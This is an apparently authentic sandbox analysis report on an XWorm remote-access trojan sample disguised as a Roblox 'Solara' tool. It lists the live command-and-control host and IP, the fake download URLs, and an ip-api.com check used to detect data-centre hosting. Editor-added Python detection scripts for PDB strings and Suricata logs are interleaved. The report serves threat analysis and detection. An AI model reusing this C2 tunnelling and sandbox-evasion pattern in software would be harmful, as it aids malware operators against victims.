Source: YgJ5inWPQO.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1471950558.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1472115949.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464730716.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbI source: dddd.exe, 0000000E.00000002.1744595376.000002624C77F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C710000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463949860.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1465060554.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C7A1000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdb source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW | 0_2_00007FF7FF5883B0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5892F0 FindFirstFileExW,FindClose | 0_2_00007FF7FF5892F0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose | 0_2_00007FF7FF5A18E4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5892F0 FindFirstFileExW,FindClose | 2_2_00007FF7FF5892F0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose | 2_2_00007FF7FF5A18E4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW | 2_2_00007FF7FF5883B0
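The PDB paths listed above are enough to fingerprint the build chain without running anything: python313.pdb together with _lzma.pdb, _bz2.pdb, _hashlib.pdb, _socket.pdb, select.pdb and unicodedata.pdb under D:\a\1\b\bin\amd64\ are the CPython 3.13 interpreter and the extension modules a PyInstaller bundle carries (the report's "Found pyInstaller with non standard icon" signature says the same), vcruntime140.amd64.pdb is the MSVC runtime they link against, and the System.pdb references in dddd.exe point at a .NET Framework 4.0 assembly (the GAC_MSIL\System\v4.0_4.0.0.0 path). The FindFirstFileW/DeleteFileW/RemoveDirectoryW loop in the code functions is consistent with the bootloader tearing down its temporary extraction directory on exit. The example below is added by the editor and is not part of the Joe Sandbox report: it recovers such paths from a raw file or memory dump by scanning for CodeView RSDS records, which is why they survive in the .sdmp regions cited above even where no PE debug directory is intact, and maps the basenames to toolchain tags. The blob is constructed inline from the report's paths; the GUIDs, ages and the tag table are the editor's assumptions.

```python
import re
import struct
import uuid

# CodeView RSDS record: b"RSDS" + 16-byte GUID + 4-byte age + NUL-terminated PDB path.
# Scanning for the magic instead of walking IMAGE_DEBUG_DIRECTORY also works on
# memory dumps whose PE headers are gone; the cost is a possible false hit on
# random "RSDS" bytes, which the printable-path requirement below filters out.
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]{4,512})\x00", re.DOTALL)

# Editor's table of CPython extension-module PDBs, taken from this report.
CPYTHON_EXT_PDBS = {"_lzma.pdb", "_bz2.pdb", "_hashlib.pdb", "_socket.pdb",
                    "select.pdb", "unicodedata.pdb"}


def extract_rsds(data: bytes) -> list:
    """Return every RSDS record in `data` as {"guid", "age", "path"}."""
    records = []
    for m in RSDS_RE.finditer(data):
        records.append({
            "guid": str(uuid.UUID(bytes_le=m.group(1))),
            "age": struct.unpack("<I", m.group(2))[0],
            "path": m.group(3).decode("ascii"),
        })
    return records


def classify_build(paths) -> list:
    """Map PDB basenames to toolchain tags (sorted, de-duplicated)."""
    tags = set()
    for path in paths:
        base = re.split(r"[\\/]", path)[-1].lower()
        if re.fullmatch(r"python3\d+\.pdb", base):
            tags.add("cpython_interpreter")
        if base in CPYTHON_EXT_PDBS:
            tags.add("cpython_extension")
        if base.startswith("vcruntime"):
            tags.add("msvc_runtime")
        if base == "system.pdb":
            tags.add("dotnet_framework")
    return sorted(tags)


def make_record(guid: uuid.UUID, age: int, path: str) -> bytes:
    """Build one RSDS record (used only to construct the sample blob)."""
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + path.encode() + b"\x00"


# Constructed blob: paths from the report, placeholder GUIDs/ages, padding bytes,
# plus a bogus "RSDS" with no printable path that must be ignored.
SAMPLE_BLOB = (
    b"\x00" * 16
    + make_record(uuid.UUID(int=1), 1, r"D:\a\1\b\bin\amd64\python313.pdb")
    + b"MZ\x90\x00junk"
    + make_record(uuid.UUID(int=2), 2,
                  r"D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb")
    + make_record(uuid.UUID(int=3), 1, r"D:\a\1\b\bin\amd64\_lzma.pdb")
    + b"RSDS" + b"\xff" * 24
)

if __name__ == "__main__":
    recs = extract_rsds(SAMPLE_BLOB)
    for r in recs:
        print(r["guid"], r["age"], r["path"])
    print(classify_build(r["path"] for r in recs))
```

Run it against the dropped files or the raw .sdmp regions; on a real binary, cross-check the scan result against the debug directory (for example with pefile) so that a stray RSDS in data does not masquerade as the link-time record.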

                      Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49838 -> 147.185.221.18:35710
Source: Malware configuration extractor | URLs: hope-asia.gl.at.ply.gg
Source: global traffic | TCP traffic: 147.185.221.18 ports 0,1,3,35710,5,7
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.8:49723 -> 147.185.221.18:35710
Source: global traffic | HTTP traffic detected: GET /asset/discord.json HTTP/1.1; Host: getsolara.dev; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api/endpoint.json HTTP/1.1; Host: getsolara.dev
Source: global traffic | HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1; Host: clientsettings.roblox.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1; Host: www.nodejs.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 104.21.93.27:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: global traffic | DNS traffic detected: DNS query: getsolara.dev
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: clientsettings.roblox.com
Source: global traffic | DNS traffic detected: DNS query: www.nodejs.org
Source: global traffic | DNS traffic detected: DNS query: nodejs.org
Source: global traffic | DNS traffic detected: DNS query: hope-asia.gl.at.ply.gg
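Three of the network findings above are the ones worth turning into detection logic. The XWorm C2 is reached through a playit.gg tunnel (hope-asia.gl.at.ply.gg, 147.185.221.18:35710, confirmed by the Suricata 2855924 "XWorm V3 CnC Command - PING Outbound" hit), the same IP is also touched on ports 0, 1, 3, 5 and 7 (the "Connects to many ports of the same IP" signature), and the GET /line/?fields=hosting request to ip-api.com is the sample asking whether it is running in a data centre before it does anything interesting. The example below is added by the editor and is not part of the report: it runs those three checks over Suricata EVE-style JSON records. The records are constructed here to mirror the report's traffic (the field layout follows Suricata's eve.json, but the exact records are an assumption), and the tunnel-broker zones other than ply.gg are the editor's extension.

```python
import json
from collections import defaultdict

# Tunnel-broker zones: ply.gg (playit.gg) is the one in this report; the other
# two are the editor's additions and should be tuned to the environment.
TUNNEL_BROKER_SUFFIXES = (".ply.gg", ".ngrok-free.app", ".trycloudflare.com")

# The hosting/VPN lookup this sample uses to spot sandboxes (host, query marker).
HOSTING_CHECK = ("ip-api.com", "fields=hosting")


def load_eve(lines):
    """Parse eve.json lines (one JSON object per line), skipping blanks."""
    return [json.loads(line) for line in lines if line.strip()]


def analyze(records, port_threshold=4):
    """Return a list of (kind, detail) findings.

    port_threshold: distinct TCP destination ports to one (src, dst) pair before
    the pair is flagged as port probing / multi-port C2 fallback.
    """
    findings = []
    ports_by_pair = defaultdict(set)
    for rec in records:
        kind = rec.get("event_type")
        if kind == "flow" and rec.get("proto") == "TCP":
            ports_by_pair[(rec["src_ip"], rec["dest_ip"])].add(rec["dest_port"])
        elif kind == "dns" and rec["dns"].get("type") == "query":
            name = rec["dns"]["rrname"].lower().rstrip(".")
            if name.endswith(TUNNEL_BROKER_SUFFIXES):
                findings.append(("tunnel_broker_dns", f"{rec['src_ip']} -> {name}"))
        elif kind == "http":
            http = rec["http"]
            if http.get("hostname") == HOSTING_CHECK[0] and HOSTING_CHECK[1] in http.get("url", ""):
                findings.append(("hosting_check",
                                 f"{rec['src_ip']} GET {http['hostname']}{http['url']}"))
        elif kind == "alert" and rec["alert"].get("severity") == 1:
            findings.append(("ids_alert_sev1",
                             f"{rec['alert']['signature_id']} {rec['alert']['signature']}"))
    for (src, dst), ports in ports_by_pair.items():
        if len(ports) >= port_threshold:
            findings.append(("many_ports_same_ip", f"{src} -> {dst} ports {sorted(ports)}"))
    return findings


# Constructed records modelled on this report's traffic (hosts, ports and the
# Suricata signature are from the report; the record shapes are assumed).
SAMPLE_EVE = [
    {"event_type": "dns", "src_ip": "192.168.2.8",
     "dns": {"type": "query", "rrname": "hope-asia.gl.at.ply.gg"}},
    {"event_type": "dns", "src_ip": "192.168.2.8",
     "dns": {"type": "query", "rrname": "ip-api.com"}},
    {"event_type": "http", "src_ip": "192.168.2.8", "dest_ip": "208.95.112.1", "dest_port": 80,
     "http": {"hostname": "ip-api.com", "url": "/line/?fields=hosting", "http_method": "GET"}},
    {"event_type": "alert", "src_ip": "192.168.2.8", "src_port": 49838,
     "dest_ip": "147.185.221.18", "dest_port": 35710,
     "alert": {"signature_id": 2855924, "severity": 1,
               "signature": "ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound"}},
] + [
    {"event_type": "flow", "proto": "TCP", "src_ip": "192.168.2.8",
     "dest_ip": "147.185.221.18", "dest_port": port}
    for port in (0, 1, 3, 35710, 5, 7)
]

if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_EVE):
        print(f"{kind:22} {detail}")
```

On a live sensor feed it with load_eve(open("/var/log/suricata/eve.json")); the tunnel-broker and hosting-check rules are cheap and catch the infrastructure pattern even after the operator rotates the ply.gg subdomain or the port.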
Source: dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463
Source: dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463/rpc?v=1
Source: dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:64632
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://clientsettings.roblox.com
Source: powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m~
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edge-term4-fra2.roblox.com
Source: dddd.exe, 0000000E.00000002.1731703513.0000026234105000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://getsolara.dev
Source: YgJ5inWPQO.exe, 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nodejs.org
Source: powershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.1938005634.00000254D6363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: msedge.exe, 0000000C.00000002.2742589628.000000000261B000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: YgJ5inWPQO.exe, 00000000.00000003.1464219398.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2195632946.0000020BF8D56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 0000001B.00000002.1757718254.0000013850C10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.nodejs.org
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
Source: dddd.exe, 0000000E.00000002.1731703513.0000026234122000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.DirOf
Source: powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clientsettings.roblox.com
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234122000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
Source: powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001B.00000002.1758362165.0000013850D50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crosoft.com/pkiops/cer
Source: dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
Source: YgJ5inWPQO.exe, 00000002.00000002.1494882785.000001D8A94E0000.00000004.00001000.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A94AF000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1476006333.000001D8A94BB000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A9448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: YgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488956192.000001D8A9415000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491431607.000001D8A9417000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
